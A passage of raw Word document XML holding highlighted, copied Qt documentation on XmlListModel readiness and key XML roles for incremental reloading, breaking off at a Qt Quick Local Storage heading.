        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is set to</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XmlListModel.Ready</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when loading is complete. Note this means when</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1653" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is used for a view, the </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view is not populated until the model is loaded</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="00F413C2" w:rsidRDefault="002736BE" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1341" w:name="using-key-xml-roles"/>
      <w:bookmarkStart w:id="1342" w:name="_Toc483000816"/>
      <w:bookmarkStart w:id="1343" w:name="_Toc483003814"/>
      <w:bookmarkStart w:id="1344" w:name="_Toc483604163"/>
      <w:bookmarkStart w:id="1345" w:name="_Toc483605383"/>
      <w:bookmarkEnd w:id="1341"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using key XML roles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1342"/>
      <w:bookmarkEnd w:id="1343"/>
      <w:bookmarkEnd w:id="1344"/>
      <w:bookmarkEnd w:id="1345"/>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can define certain roles as "</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keys" so tha</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t when</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1654" w:anchor="reload-method" w:history="1">
        <w:r w:rsidRPr="008F1DE7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>reload()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is called, the model will only add and refresh data that contains new values for these keys</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if above role for "pubDate" was defined like this instead:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="00490E7E" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1655" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"pubDate"</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> query</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"pubDate/string()"</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> isKey</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then when</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1656" w:anchor="reload-method" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>reload()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is called, the model will only add and reload items with a "pubDate" value that is not already present in the model.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is useful when</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> displaying the contents of XML documents that are </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>incrementally updated</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSS feeds</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to avoid</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> repainting the entire contents of a model in a view.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If multiple key roles are specified</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the model only adds and reload items with a combined value of all key roles that is not already present in the model.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1657" w:history="1">
        <w:r w:rsidR="0068181D" w:rsidRPr="008D56D4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-localstorage-qmlmodule.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1346" w:name="_Toc483000817"/>
      <w:bookmarkStart w:id="1347" w:name="_Toc483003815"/>
      <w:bookmarkStart w:id="1348" w:name="_Toc483604164"/>
      <w:bookmarkStart w:id="1349" w:name="_Toc483605384"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Local Storage QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1346"/>
      <w:bookmarkEnd w:id="1347"/>
      <w:bookmarkEnd w:id="1348"/>
      <w:bookmarkEnd w:id="1349"/>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
